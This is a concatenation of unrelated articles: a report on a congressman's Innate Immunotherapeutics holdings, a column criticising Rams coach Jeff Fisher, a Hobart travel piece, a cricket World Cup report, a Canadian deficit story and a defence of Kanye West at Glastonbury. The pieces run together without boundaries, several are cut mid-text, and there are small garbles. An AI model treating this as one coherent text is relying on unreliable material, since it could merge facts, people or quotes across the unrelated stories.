Collins joined the board in 2006 and the company first sold shares to the public in 2013 . From 2013 to 2016 , he bought Innate shares then worth between $ 3.5 million and $ 16 million and has not sold any , according to his congressional disclosure statements . Collins now owns nearly 38 million shares of the company , worth about $ 25 million based on the stock 's recent closing prices on the Australian stock exchange . That price peaked at $ 1.35 a share on Jan. 25 and is now under $ 1 .
Innate has never had a revenue-producing product and has relied mainly on investor capital for funds . The congressman made four personal loans to Innate in 2012 and 2013 totaling $ 1.3 million that were later converted to shares and options to buy more shares at discounted prices , according to company financial reports .
Collins also promoted Innate among people in his professional and social circles , drawing investors whose share purchases have helped keep the company afloat .
Americans own 44 percent of Innate , according to a company-funded research report on its website . Many of those shareholders seem to come from an interconnected circle of prominent Buffalo investors with Collins at the center , based on company documents , congressional disclosure statements and political contributions reported in Federal Election Commission filings .
Investors who bought stock in two private placements by Innate have contributed at least $ 105,000 to Collins ' congressional campaigns , according to the Public Accountability Initiative in Buffalo , a nonprofit that investigates politics and government , which compared an Innate shareholders ' document with FEC filings .
One was Glenn Arthurs , an executive in the Buffalo office of UBS , the Swiss financial services giant . Another was Paul Harder , who runs a private investment firm in Buffalo , CHEP II . Arthurs and CHEP II both ranked among Innate 's top 20 shareholders last year , according to the company 's annual report . Both have also contributed to Collins since 1998 , the year of his first — and unsuccessful — congressional campaign , FEC records show .
Collins ' congressional chief of staff , Michael Hook , who began working for Collins early last year , bought shares of Innate 28 times last year , according to his disclosure statements . Sometimes he purchased thousands of dollars of stock multiple times in a single day , those filings show .
Bill Paxon , a former congressman from Buffalo and a lobbyist whose clients include PhRMA , the major drugmakers ' trade group , has invested in Innate . So has Lindy Ruff , the former coach of the Buffalo Sabres hockey team , who is now head coach of the Dallas Stars . Both were identified in a public company document for shareholders .
Ruff declined to comment on his Innate investment . Paxon , Arthurs , Harder and Hook did not reply to repeated requests from KHN for comment .
Mark Lema , Roswell 's head of anesthesiology , told The Buffalo News recently that he became an Innate investor after overhearing Collins discussing it at a meeting for Buffalo visitors that Collins hosted in Washington , D.C . But he 's never discussed Innate or MIS416 with study researchers at Roswell , he said in a subsequent interview with KHN .
A Complaint In Australia
Recent published reports in the U.S. detailing Collins ' ties with Innate are what provoked Sydney lawyer — and Innate shareholder — James Wheeldon to question Collins ' adherence to Australian securities laws , according to the 10-page letter that he sent Feb. 3 to Innate and the Australian Securities and Investment Commission .
Wheeldon alleged that Collins failed to disclose his large holdings in Innate to the Australian Securities Exchange within two business days of becoming a substantial stockholder , as the country 's law requires .
Stating that Collins owned more than 15 percent of the company before Innate went public in December 2013 , Wheeldon alleged that Collins did not inform the exchange how much he owned until almost 18 months later .
Wheeldon also said that published reports about Collins ' “ family , professional , political and financial relationships ” with other Innate shareholders like Price had never been disclosed to the Australian financial market to his knowledge , “ but rather has only come to light as a consequence of these press reports . ”
Collins , his children , political allies and his donors control at least 27.25 percent of the company — giving Collins greater influence over the company than has been disclosed to shareholders , Wheeldon wrote .
“ Mr . Collins duty is not to enrich the business and political elite of Buffalo , New York . His overarching duty is to the company , ” reads Wheeldon 's letter .
The stakes may be high , but the data from the Roswell study might not produce strong conclusions . Twelve people will be in the study , which is to be completed in August 2018 , according a listing on clinicaltrials.gov . The start of the trial has been postponed five times since July and is now scheduled for this month . Recruiting for participants has not started yet , according to the listing .
Innate and Roswell began collaborating in 2009 and as both sides tell the story , Collins — the man who first connected the Australian biotech firm to Buffalo — had nothing to do with it . According to Roswell , the doctor running the trial , Kunle Odunsi , learned about MIS416 that year when Wilkinson , the CEO , pitched the drug at a presentation in Buffalo to prospective collaborators . Roswell researchers have been testing the vaccine in mice with tumors since first receiving the National Cancer Institute grant in 2011 .
The trial is called an “ investigator-initiated ” trial , meaning that Odunsi has an agreement with Innate to explore the use of MIS416 for a cancer vaccine for free . Innate donates the drug , Roswell sponsors for the trial and if it 's successful , researchers could approach a medical journal to publish the results .
“ A publication by a reputable clinical center ( e.g. , Roswell ) in a prestigious journal [ … ] would almost certainly increase off-label usage , thus increasing sales , ” Kenneth Kaitin , director of the Tufts Center for the Study of Drug Development , wrote in an email .
Wilkinson said Collins has played no role in lining up the clinical trial at Roswell or getting the NCI funds to pay for it . McAdams , Collins ' spokesman , said Collins had “ zero involvement ” in the grant .
First of all , good luck to Rob Boras . And no , I 'm not being a wise guy here . Boras are getting a chance to coordinate an NFL offense , and though the circumstances are far from ideal , it still has to be an exciting opportunity for him . Boras will see if he can make a positive difference over the final four games by jolting the Rams ' offense from their sustained coma . It 's a difficult assignment , and I sincerely wish Boras well .
Boras are placed in charge of the care of this sickly offense on Monday when Rams head coach Jeff Fisher fired the overwhelmed ( and underwhelming ) Frank Cignetti as the team 's offensive coordinator . This was Fisher 's response to increasingly intense criticism , the questions about his job security , and an embarrassing set of numbers .
The Rams are 31st among 32 teams in offensive points per game ( 14.4 ) , 31st in touchdowns from scrimmage , and are last in the NFL in passer rating ( 69.8 ) , yards per passing attempt ( 6.0 ) , completion percentage ( 56.0 ) , net passing yards per game ( 178 ) , total net yards from scrimmage per game ( 305 ) , and third-down conversion rate ( 24.5 percent . )
Since STATS LLC began tracking third-down success rates as an official league statistic in 1972 , the Rams ' current percentage rate ranks No . 1,294 on a list of 1,297 teams . Only 1976 Tampa Bay ( 24.4 ) , 2002 Dallas ( 24.0 ) and 2005 San Francisco ( 24.0 ) were worse .
But it 's close , and the Rams have a chance to be the NFL 's most futile third-down team since '72 .
During the five-game losing streak the Rams have averaged 10.4 points per game and scored five offensive touchdowns . This continues a trend , with a bad offense being a central factor in Fisher 's 4-11 record in his last 15 games . The heat is on the head coach . He is n't used to that . He does n't like it . Fisher — who has had such a comically easy ride here — flashed his arrogance by recently telling critics to kiss his rear end .
Which , come to think of it , was the same as telling the critics to kiss his offense .
And now this : a classic “ we 've got to do something to get everyone off my back ” maneuver , with the coach attempting to show that he cares . That he 's not going to take it anymore . That he 's tired of watching his own offense .
Fisher was n't going to fire himself , you see .
And Cignetti was a convenient , ridiculously easy patsy .
See ya , Frank .
Fisher surely does n't think the public — or his own players — are this stupid , does he ?
Maybe he does .
In explaining the firing , Fisher said : “ Players contributed , coaches contributed , everybody contributed , but we have to move in a different direction . The lack of production is obvious . ”
When asked if Rams players were shocked by Fisher 's decision to tell Cignetti to clear out of Rams Park , the coach said : “ Yes , they were . They were and I hope they all took it personally because they need to . You 've got a good man and a good football coach that 's busting his butt every single day . Now , for whatever reasons , he 's no longer here . They have to take some responsibility for that . ”
You may have noticed a few things that Fisher did n't say there .
Things like …
“ I should have never hired Frank Cignetti in the first place , so this is on me . One hundred percent of it . ”
Or …
“ After Brian Schottenheimer left for another job , I had an opportunity to really shake up this offense and take it in a fresh , creative and forward-thinking direction . But instead of hiring the most innovative offensive mind I could have brought in here in an effort to stimulate this offense , I walked down the hall at Rams Park and hired Frank . I did the easiest thing possible . I did n't strive for a higher standard . I let this organization down . ”
Or …
“ We traded for a new quarterback in Nick Foles , and we drafted an exciting franchise-caliber running back in Todd Gurley , and we have a young playmaker in Tavon Austin who can do some magical things with the football in is hands . It was the perfect time to recruit an offensive coordinator that could put it all together and give this offense a new look . But I did n't do that , so once again , all of the blame goes on me . ”
Or …
“ You know , I have to take a hard look at myself . And that 's overdue . Why are my offenses so pedestrian , and ineffective ? Why have I been so slow in adjusting to the modern NFL style of offense ? Why am I still stuck in the past ? I really have to evolve . ”
Or …
“ You may not remember this , but before I hired Schottenheimer in 2012 , I interviewed Hue Jackson for the offensive coordinator 's job . I hired Schotty . But looking back , I went with the wrong guy . Look at the great job Hue is doing in Cincinnati . He 's really thrived in that role , and has turned the Bengals into one of the best offenses in this league . ”
Or …
“ We neglected this offensive line for years , and then drafted a bunch of rookies in 2014 and 2015 . And we threw them all out there , expecting to get positive results . That was naive on my part . As a proponent of the running game I should know that you can only get the train rolling if you have a strong offensive line . You ca n't consistently move the ball with a young , inexperienced and vulnerable offensive line . ”
Or :
“ While I believe that we have players who are capable of performing better on offense , let 's be honest here : these are players that I wanted . If they are n't as good as I believed they 'd be , then that 's on me . ”
No , we did n't hear any of that from Coach Fisher on Monday when he shoveled the blame for a dull and dysfunctional offense into every corner except his own second-floor corner office . This came as no surprise .
Later in the day , on his Monday-night show on 101 ESPN , Fisher did say “ We 're all the blame . I 'm to blame . ”
( That may be a first . )
It 's an appropriate time to remind everyone what this is all about — other than the coach attempting to cover the backside that he invited everyone to kiss a couple of weeks ago :
This offense at Rams Park is a Jeff Fisher production .
In the Fisher football operation , the offensive coordinator exists for two reasons : ( 1 ) run the bruising Fisher offense but remember that Coach does n't appreciate the value of having an evolved or even above-average passing game ; and ( 2 ) take the hit as the official scapegoat when Coach Fisher decides it 's time to make a change .
Fisher made the change Monday .
Even though he , Fisher , wo n't change .
Here are the basics of the Fisher profile :
— This is his 20th full season as a head coach . His teams have made the playoffs six times .
— In four of the six playoff seasons , Fisher 's Tennessee Titans had an above-average offense in points scored . This should have reinforced the importance of having a capable offense that can do its fair share in getting the team to a playoff level .
— Fisher has had an above-average offense ( points scored ) in nine of his 20 full seasons .
— Fisher has an above-average offense ( in points ) in only two of his last 10 seasons as head coach , including 2015 .
— Fisher 's offense has been below-average ( in points ) eight times in his last 10 seasons .
— Let 's cite the advanced metrics at Football Outsiders : Fisher 's offense has ranked 20th or worse in DVOA ( adjusted efficiency ) eight times in his last 11 seasons — and has n't been rated better than No . 15 in the league since 2003 .
— STATS LLC keeps track of the points-scored average of the teams that make the playoffs each season . In Fisher 's first 19 seasons , his teams reached the playoff-caliber average for points scored only three times in 19 years — 1996 , 1999 , and 2003 .
— This is Fisher 's fourth year as head coach in St. Louis . Here are the Rams ' annual ranking ( in order ) for offensive points scored beginning in the 2012 season : 28th … 22nd … 23rd … 31st . They 've never topped more than 19 offensive points per game in a season .
— In Fisher 's 60 games as Rams coach , his offense has scored fewer than 21 points per game ( the league average ) only 33 times . And they 've been held to 14 points or fewer in 24 of 60 games .
— A bullish rushing attack is always a plus , but you ca n't live exclusively on the ground . Even for teams that thrive at running the ball — and Seattle is a great example — an effective passing game is a must-have component . In NFL history , the six-highest passing yards totals have occurred over the last six seasons with teams averaging 233 net passing yards per game since 2010 . The escalation has reached a net average of 246 yards passing per game this season , but Fisher 's Rams ca n't get into the jet stream . The Rams are averaging a league-low 178 net passing yards per game this season — or 27.6 percent below league average . In Fisher 's four seasons the Rams ' average of 203 net passing yards is 15 percent below league average .
— During these four Fisher-offense seasons the Rams rank 28th in net passing yards , 24th in completion percentage , 28th in yards per passing attempt , 26th in passer rating , 27th in touchdown-pass percentage , and were 25th in average yards per catch ( 11.2 . )
— The Rams have thrown 72 touchdown passes in Fisher 's 60 games ( only eight this season . ) The NFL-team average over the last 60 games is 94 touchdown passes … meaning that the Rams are 23.4 % below average at producing TD passes .
OK .
That should give you a good handle on Fisher 's history on offense .
Here 's what I do n't understand : during Fisher 's most successful five-year stretch as a head coach , from 1999 through 2003 , his Tennessee team was tied with the Rams for the league 's best regular-season winning percentage ( .700 ) during time . And not only did the Titans advance the ball through the air , they were very good at it . One of the best passing teams in the NFL between 1999 and 2003 — ranking fifth in yards per attempt , fifth in passer rating , eighth in touchdown passes , and ninth in net passing hards .
Fisher reached his apex as a coach with Steve McNair at quarterback . The Titans ' formidable balance of run/pass was difficult to stop . Clearly the coach discovered something over those five seasons : a physical rushing game is a solid foundation for an offense — but if you want to be special you have to be able to throw it , too .
You can say that the quarterback is n't good enough , and it is n't fair to compare this offense to the Fisher offense led by McNair . To that , I say this : are we supposed to believe it 's impossible to find a quarterback who can approximate the value that McNair had at Tennessee ? Who chooses the quarterback in St. Louis ? Who has the authority to make the QB position a priority instead of an accessory ?
You can say that the overall offensive talent is lacking on offense , so what 's a coach supposed to do ? To that , I say : Fisher has enormous power in choosing the players and stocking the Rams roster . These are not only the players that Fisher wanted , but Fisher and his assistance are also responsible for coaching this talent and making it better .
You can say that Fisher drafted RB Todd Gurley , a gamble that looks like a winner . So does n't Fisher deserve credit for Gurley ? To that I say : the Gurley pick was brilliant , and applause for Fisher is warranted . OK , now let 's talk about the coaching . Once defenses reacted to Gurley 's first four ( and sensational ) NFL starts by scheming him into a wall of tacklers — where were the adjustments ? Gurley has averaged 52 yards rushing over the last five games , all losses . Over the past three games he 's carried 43 times for 126 yards , an average of 2.9 yards per run , and has one gain of 10+ yards . Cignetti was n't the only coach at Rams Park that had a hand and a say in the offense .
You can say that it 's hard to have a good offense with a young and overmatched offensive line . To that , I say : why did Fisher and GM Les Snead wait so long to draft and develop O-linemen ? In their first two drafts , Fisher and Snead had 17 selections to work with and used only two on offensive linemen . And both players were interior linemen ( guard or center ) drafted in the fourth round or later . In their first three drafts Fisher-Snead had 28 draft choices in hand and selected five offensive linemen overall .
And while the Rams drafted offensive tackle Greg Robinson with the No . 2 overall pick in 2014 , they drafted the other four offensive linemen with picks at No . 113 … No . 150 … No . 226 … No . 250 .
Why wait until your fourth draft to address this critically important area and then suddenly pick five offensive linemen in the 2015 draft — including one taken in the supplemental draft ? Why suddenly cram the roster with so many rookie or linemen ? By the fourth season of a coach 's program , the offensive line should be settled in , functioning smoothly , and peaking . It should be an asset — not a disorganized liability . By the fourth season of a rebuild , the offensive line should be an established strength instead of a mishmash of young players and journeymen thrown together .
Even if we 're inclined to give Fisher an attaboy for at least trying to do something to perk up this offense by switching coordinators , it does n't mean much . Fisher waited too long to make this move . Fisher said he 'd been thinking about replacing Cignetti for a while . “ I 've looked hard it , yeah , over the last couple of weeks , ” Fisher said . “ Just have n't gotten the production . We 're getting what we want out of them on the practice field . It 's not carrying over to the game . I did n't wake up this morning and make this decision . ”
Well , Fisher had just cause for making the call sooner than this .
After all , the Rams scored 10 points or fewer in three of their first five games so the warning signs were there early . And the current five-game losing streak that sank their season presented numerous opportunities to shake up the staff ; the Rams scored 18 points or fewer in all five games . Why wait until after the 12th game , with only four contests remaining ? It 's too late . The Rams ( are 4-8 ) have a 1.8 percent chance of making the NFC playoffs as a wild-card team .
Any way you look at it , that big foam finger of blame points to Fisher
Cignetti was Fisher 's personal choice to take over at OC .
This is Fisher 's coaching staff . These are his draft choices , his free-agent signings , his roster .
This is Fisher 's offense .
His responsibility . And his failure .
Thanks for reading …
–Bernie
Read More : Fisher Firing Cignetti Wo n't Solve All Rams ' Offensive Problems
Not long ago , Hobart was an end-of-the-world sort of town that seemed achingly far from anywhere – and particularly far from culture . It was not the kind of place where you would find people queuing for a museum , out dancing on a Friday night , dining on imaginative , cosmopolitan food or quaffing top-notch local wines . Hobart was rather stolidly staid : a nice place to visit for its gorgeous natural setting , but not the place for much creativity or culture .
But today , Tasmania 's capital is downright cool . Think of a city with one of the world 's best museums of modern art , eclectic festivals of arts and music , and bountiful art house cinema and theatre . Think of a place that is a smorgasbord for discerning epicureans with home-grown fine wines . Think also of hip places to stay : a dockside art hotel that was once a jam factory or a colonial mansion gone contemporary .
Australia 's eclectic museum
MONA , the new and daring Museum of Old and New Art , has had perhaps the most influence on Hobart 's new hipster image . The eclectic museum housed in an avant-garde edifice on the banks of the River Derwent has been wowing the international art world since its opening in 2011 . Exhibiting the collection of gambling millionaire David Walsh , this is the largest private collection in Australia and contains both big and unknown names . MONA is in no way about art snobbery : it is raw , sometimes shocking and unpretentiously cool . With top restaurant The Source , which gets creative with the best of local produce , as well as the onsite MooBrew microbrewery and Moorilla winery , MONA is a whole hip world unto itself . To completely immerse yourself , stay at the architecturally fabulous and art-saturated MONA Pavilions , located on the edge of the River Derwent .
A city of makers
MONA is in some ways emblematic of many things Hobart has become . Still proud of its working-class roots , Hobart is creative , unselfconscious , down-to-earth , large “ G ” Green and small “ l ” liberal . Community is important here , and if you have a good idea , the city is small enough to make a mark . All this means that Hobart 's new cool is all about making – making art , music or food that is one off , unique , perhaps organic and definitely handcraftedly-hip .
Hobart 's colonial sandstone warehouse strip , Salamanca , and the city-side docks are a great place to experience this creativity in concentration . At the huge Saturday market , you can browse through an eclectic mix of handmade offerings . Buy some Summer Kitchen organic sourdough bread made in the village of Ranelagh , south of Hobart , to devour with some famous Bruny Island cheese ( try the especially delicious one-day-old olive oil marinated cow 's cheese ) . Then among the convict-hewn sandstone , search for handmade treasures in shops like The Maker ( unique clothes and jewellery ) , Norman & Dann ( handcrafted chocolates ) , ending with an off-beat exhibition at the Salamanca Arts Centre . If you are in Salamanca in the evening , meet local music makers at Rektango , a Hobart institution of music – funk , reggae , soul , blues , rock – dancing and convivial vibes in a rock-hewn courtyard just behind Salamanca Place .
Down at the dockside ( where fast catamarans will take you 16km upriver to MONA ) , it is all waterside dining with views over the working fishing port , Antarctic icebreakers and tall ships . Stroll through here to the artsy precinct of Hunter Street , home to the Henry Jones Art Hotel , set in historic industrial buildings that were once a jam factory . As well as being downtown 's coolest place to stay , the Henry Jones is also an extensive exhibition space for Tasmanian art . There is more Tassy creativity on display at the nearby waterfront Tasmanian School of Art , where the Plimsoll Gallery showcases innovative local , national and international contemporary art and design .
City revival
Hobart 's city centre was long a little dull , and while it can still feel like a ghost town after dark , a fantastic selection of funky shops , restaurant and cafes make it worth exploring .
Dive into Tasmania 's best bookshop , Fullers on Collins Street , for your holiday reading , then indulge in macaroons and tea in their cafe with its perfect panorama of 1,271m-high Mount Wellington looming over the city .
Love & Clutter on Murray Street is one of those stores where you want to browse for hours and buy everything . They sell a wonderful mix of unique clothes , jewellery , bags and toys – effortlessly offbeat treasures for both little people and big .
Sidecar , just north of the city centre , is one of Hobart 's newest and coolest hangouts , where the city 's beautiful people come for an innovative menu of tapas for both lunch and dinner . Try the pan-fried mushrooms with toasted pumpkin seeds from the Huon Valley in Tasmania 's south , or scrumptious wagyu hotdogs from beef in the island 's northwest . There is also a perfectly chosen international wine list as accompaniment .
Garagistes , just next door , is the hands-down hippest restaurant in town . At shared tables in a trendy warehouse conversion , head chef Luke Burgess ( who had posts at Tetsuya 's in Sydney and Noma in Copenhagen ) serves up a surprising artistry of dishes : roast saddle of aged lamb with kunzea , fried saltbush , grilled lettuce and milk curd or wood-grilled king tiger prawns with eel dashi shiitake , puffed wild rice and basil . The creative food is accompanied by a globe-roaming natural wine list .
Go north
To round off the tour of Hobart 's new cool , head to North Hobart , the city 's most eclectic and most culturally diverse suburb where newfangled street art meets working-class grunge , and just about anything goes . The Republic Bar has long been an institution for drinks and live music on the main Elizabeth Street strip , which is jam-packed with restaurants , from Thai to Turkish . For eclectic art , visit the Bett Gallery , which exhibits and sells some of the country 's finest young talent . And do not miss the State Cinema . You could pop in just for a coffee or to browse the bookshop , but better , take in an alternative or foreign film in one of the six intimate cinemas at this classy art house spot .
Festival time
For a city of its size ( population just 210,000 ) Hobart has a magnificent constellation of festivals . The coolest of these has to be MONA FOMA – MONA-led alternative music performances ( mostly free ) held in converted warehouses by the docks every January . It is a mix of classical , blues-grunge and cutting-edge experimental , with past performers including Nick Cave and the Bad Seeds , Grinderman and Philip Glass . The festival is curated by American Brian Ritchie ( of Violent Femmes fame ) who now calls Hobart home .
Contrast this with the four day Festival of Voices – held every July , the dead of winter . Either listen to a wonderful variety of voices – from choral to jazz to gospel – or sculpt your own voice at workshops and even add it to the festival choir that crescendos around a vast bonfire into the darkest nights of the year .
If theatre is what you are after , plan your trip for Ten Days on the Island , a celebration of island culture that sees performers ( from Tasmania to Iceland to Hawaii ) create theatre that is so perfectly alternative-creative and effortlessly down-to-earth-cool that it has found its natural home in the new , hip Hobart .
|
|
Special Coverage :
Twenty-eight long years after that magical Indian summer in England , the Men in Blue are one victory away from proving that India is truly cricket 's superpower , not just commercially but also on the field.In Pics : Indian fans in Mohali One victory away from being world No.1 in ODIs , in addition to Tests . One victory away from giving the ultimate thank-you gift to the greatest cricketer since Don Bradman , and a fitting farewell to a coach who has contributed so much to their rise . And one victory away from giving millions of young Indians born after 1983 - including several members of the present team - the joy of knowing what it actually feels like to have your squad lift the Cup that counts before your jubilant eyes . Kumar Sangakkara - Sanga to millions of fans - is waiting with his formidable Lankans . But so is the opportunity of a lifetime for Dhoni 's Daredevils . ( Read : For WC final , Wankhede a no-vehicle zone ) ( Read : After pubs , party spills onto Mumbai 's streets India went into the semifinal against Pakistan as odds-on favourites , and for once the bookies had it right . The quality of cricket did n't really live up to the occasion but the ebb and flow of emotions - from exuberance to unease to disappointment to hope to joy to sheer mad exultation - more than compensated . Wednesday 's win extends India 's record against Pakistan at the World Cup to 5-0 . Some day , the law of averages will catch up , but not with history beckoning so alluringly.It was supposed to be India 's batting vs Pakistan 's bowling but as often happens in cricket , things did n't go according to script . The Indian innings got off to an explosive start , powered by Virender Sehwag , stuttered midway and finally lurched to a total - 260 - that could at best be described as fighting . Man of the match Sachin Tendulkar produced one of the patchiest innings of his stunning career , but its value became more and more apparent as the Pakistani innings steadily went into terminal decline.The bowling , though , was a revelation . Defending 260 meant there was no scope for even a single bowler to have an off-day . No one did , with Zaheer , Munaf , Nehra , Harbhajan and Yuvraj all taking two wickets each . Incredibly , the first extra , a wide , came as late as the 37th over . Dhoni attacked throughout , the Men in Blue fielded with tigerish resolve and the bowlers never eased the pressure , even when Pakistan appeared to be cruising.At the end of India 's innings , Pakistan would have fancied their chances . After a blistering start from Virender Sehwag that briefly raised visions of India crossing 350 , Afridi 's men had succeeded in reining in India for 260 - a total that most pundits felt was at least 20 runs below par , given the small ground and fast outfield.Umar Gul , supposed to be Pakistan 's spearhead , was taken to the cleaners , going wicketless and conceding 69 runs in 8 overs - the worst economy rate ever by a Pakistani bowler against India in a World Cup match . But young left-arm pacer Wahab Riaz rose to the occasion , taking 5 wickets for 46 - the best ever by a Pakistani against India at the World Cup.Riaz , varying his pace intelligently , gave an excellent display of seam and swing as he struck at vital moments . He brought Sehwag 's blistering innings to a disappointingly premature end and then returned to dismiss Kohli . Yuvraj Singh walked in to a huge ovation from his home crowd . It turned into stunned silence as Riaz produced a full swinging delivery that crashed into Yuvi 's stumps.For good measure , Riaz also got rid of Sachin Tendulkar . Afridi had vowed before the match that Pakistan would n't let Tendulkar get his 100th international century but his teammates seemed bent on proving him wrong , generously offering chance after chance . Tendulkar struggled to pick Saeed Ajmal and was given out LBW but survived when he asked for a review . On the very next ball , the Pakistanis appealed for a stumping . Sachin was then dropped thrice off Afridi and once off Hafeez before Afridi finally caught him . It was perhaps fitting that Sachin 's 100th century did n't come from such a flawed innings.Dhoni hung around without ever looking convincing and it was left to Raina to guide India to a semblance of respectability . Ironically , overs 44 and 49 , which yielded 43 runs for the loss of just 1 wicket , were actually one of India 's most productive uses of the batting powerplay in this Cup . The bowlers had done their bit with the bat . They were to do much , much more with the ball .
Opposition MPs jumped on news of Ottawa 's bigger than expected deficit as proof of the government 's mismanagement of the economy and demanded that Finance Minister Jim Flaherty be replaced .
OTTAWA – Canada 's ballooning $ 50-billion deficit is `` affordable , '' Prime Minister Stephen Harper said today as he fended off political demands to dump his finance minister .
`` We are borrowing money at historically low interest rates to help unemployed people , to build infrastructure . That is what we should be doing and what we will continue to do , '' the Prime Minister said .
Harper said the recession has meant growing payments to the unemployed and stimulus spending to communities coupled with lower tax revenues , which have all combined to cost federal coffers .
`` Canadians just can not trust this government with their money . Will the Prime Minister fire this minister of finance ? '' Liberal Leader Michael Ignatieff said during Question Period .
McCallum declined to be drawn into election speculation but added : `` In a minority government setting , one can never rule out an election . ''
But that would depend on how news of the bigger than expected deficit is received by the Canadian public , something that will take days , even weeks to unfold .
The ballooning deficit , which Flaherty now says could exceed $ 50 billion , could change the political dynamic in Ottawa , tempting opposition parties into toppling the minority government before the summer recess .
`` They overspent when times are good so we have a far bigger deficit than we need had they been more fiscally prudent . ''
`` Whether that will lead to an election , you can speculate , I will not , '' he said .
He said after his party 's morning caucus meeting that the Liberals are taking aim at the Conservatives on three key points — reforming employment insurance , speeding stimulus spending and their record as an `` incompetent fiscal manager . ''
But he was clear that the rising tide of red ink will not deter the Liberals from pressing the government to improve employment insurance benefits , even though that would mean billions of dollars more federal spending , McCallum said .
`` To the extent that the economy is weaker than people thought , there will be even more unemployed people falling through the cracks who will need this assistance , '' McCallum said .
Flaherty 's forecast of a $ 50-billion revenue shortfall is $ 16 billion higher than he predicted in the budget only four months ago .
And McCallum pointed out that Flaherty 's November economic update did not foresee any budget deficits .
`` Sadly , I 'm afraid this serves to further undermine confidence in our finance minister at a time when Canada desperately needs competence and strength at the helm in this area , '' McCallum remarked .
`` It 's incredible that the same person who told us in November that Canada would have nothing but surpluses forever now acknowledges he 's the $ 50-billion man . ''
The Liberals are expected to demand Flaherty step down during the afternoon question period in the Commons . There has been no indication that Flaherty 's job is in jeopardy as far as Prime Minister Stephen Harper is concerned .
Yesterday , McCallum called the deficit `` a shocking number , '' noting it is the largest deficit in Canadian history .
NDP finance critic Thomas Mulcair also took dead aim yesterday at Flaherty 's credibility . `` He 's wearing the dunce cap of all Canadian finance ministers , '' Mulcair said of Flaherty .
`` He swore up and down ( last fall ) that we would never go back to deficits . Then he said there was not going to be a recession .
`` If we want to get out of this mess , the government 's got to start telling the truth and the whole truth . ''
Harper is facing increasing heat as the country 's economic problems worsen , with Liberal Leader Michael Ignatieff threatening to topple the Conservative minority and force an election if the Tories continue to refuse to bring in major improvements to employment insurance during the recession .
But Flaherty said `` it 's necessary in the short term to run a large deficit — relatively large — to make sure that Canada gets through this ( recession ) well . ''
Previously , the worst yearly budget deficit was $ 39 billion , recorded by the Mulroney Tories in 1992-93 .
Flaherty 's revelation was the latest in a string of economic blows . Fresh proof of how badly the economy is crashing came hours before , when it was reported that 10.6 per cent more people were receiving employment insurance payments in March than the previous month .
In the Commons , McCallum said the government 's deteriorating fiscal position reminds him of the unexpected budget deficit run up by the former Ontario Progressive Conservative government of which Flaherty was a part .
`` In 2003 , the finance minister was a senior member of the Mike Harris government and they ran on a balanced budget . Whoops , it turned out to be a big deficit , '' McCallum said , adding that last fall Flaherty predicted budget surpluses , but that 's given way to a huge deficit .
`` Why is the minister so bad with numbers ? '' McCallum asked .
Fielding the question , Harper said , `` Virtually every national government in the world is running a deficit . Ours , by comparison , remains much lower than our competitors . ''
NDP Leader Jack Layton took aim at the Conservatives for creating `` the largest deficit we have seen in the history of Canada . ''
`` What do they have to show for it ? There have been 400,000 people thrown out of work . There should at least be some results for the steps that they have taken , but there are not any , '' Layton said .
Flaherty said later the rising deficit was partly attributable to increasing EI payments , which he said would be several billion higher than the $ 19 billion budgeted for in January . Ottawa is also committed to supporting the struggling auto industry , he noted .
He declined to say if next year 's prediction of a $ 30 billion deficit would also need to be revised .
But he insisted that the Conservatives would as planned bring the government out of deficit in four years without raising taxes .
Also , there are `` some encouraging signs '' in the economy , he said , adding that some analysts expect economic conditions to improve later this year and into next year .
In Defence of Kanye James MacLaren
In the news this week has been the announcement that Kanye West is set to headline Glastonbury this year . True to form , ‘ Ye himself was distracted by nude photos of his wife . Nonetheless , this has prompted 110,000 ( and counting ) people to sign a petition demanding that the Eavis family rescind this booking and replace him with a ‘ rock band ' . Far be it for me to suggest that 110,000 people are actually philistine jackasses , but… that 's exactly what I am going to do . Such a petition is ridiculous and I damn well hope that the Eavis family ignore it .
Let 's deal with the elephant in the room , shall we ? Kanye himself . There are few people alive that can claim the honour of being called a ‘ jackass ' by the President of the United States not once , but twice . Even his own friends have been embarrassed by him at times . There is no doubt that he has done some damned stupid shit at times . His interruptions at awards ceremonies are becoming de rigour with far inferior egos trying to get in on the act . Now what exactly is his crime here ? He disagrees with the award given and stands up , interrupts proceedings , and says so . Who has n't felt like doing exactly this ? I have . I have also sat at home wishing that someone would say out loud what I was thinking . If it were anyone other than Kanye , we would applaud . Admittedly , I wish it had n't been Beck . Beck is a pretty talented guy , and while he would n't have been my choice to win , it 's hard to begrudge him the award . But what is Kanye 's crime ? Caring so much that he ca n't sit still ?
Maybe it is n't so much that , but the gargantuan size of his ego . Kanye thinks he is so important that he has the right to butt in . In that case , his crime is having bad manners . There are other pop and rock musicians that have a sense of self that borders on the planetary , and also plenty of artists that have staggeringly bad manners . So , why do we care about Kanye ? I think it 's because he is hilarious . I am generally staggered by people taking these antics so seriously . We all know that awards ceremonies are laughable and that the winners are rarely deserving . Sure , Kanye is also guilty of taking these things seriously but that 's what makes Kanye 's outbursts all the more entertaining . However , why is it that I see it as hilarious while others think it an act of overbearing arrogance and stupidity ?
Consequently , I do n't think that the problem is Kanye 's antics – instead , it is the belief that Kanye 's arrogance is undeserved . Reading the comments on change.org , a continuing motif is that he is talentless . So the mindset present here is that Kanye lacks the prestige to match his ego . But how true is this ? By any measure of artistic success , Kanye succeeds . He has sold records by the bucketful ; he has , on multiple occasions , topped best-of lists ; and clearly has the ( artistic ) respect of his peers from across the musical spectrum . Certainly , so far as Glastonbury headliners go , he stands head and shoulders above most who have achieved that coveted spot over its 40-odd year history . Looking down a list of headliners , you have to go back to 2003 to find a band that has met the above criteria in contemporary terms . ( Bands or artists like Stevie Wonder or Neil Young , as legendary as they are , fell out of contemporary favour long ago . )
I suspect that the principle objection to Kanye is revealed at the bottom of the petition , where it suggests that he is replaced by a ‘ rock band ' . On what grounds should a rock band headline Glastonbury ? This point has been raised today by that paragon of relevance , Ronnie Wood . Ronnie says : “ Glastonbury is the home of rock music and , look , Kanye is n't rock… He 's a great entertainer and he knows how to captivate an audience with all his swearing , but when it comes to what that festival is about , it 's the wrong choice. ” But again , is this true ? As an arts festival , Glastonbury has been headlined by a variety of non-rock acts , whether it be soul , jazz or world music . It seems to me to be common knowledge that if rock is your thing , Glastonbury is n't your festival – try Reading or Ozzfest .
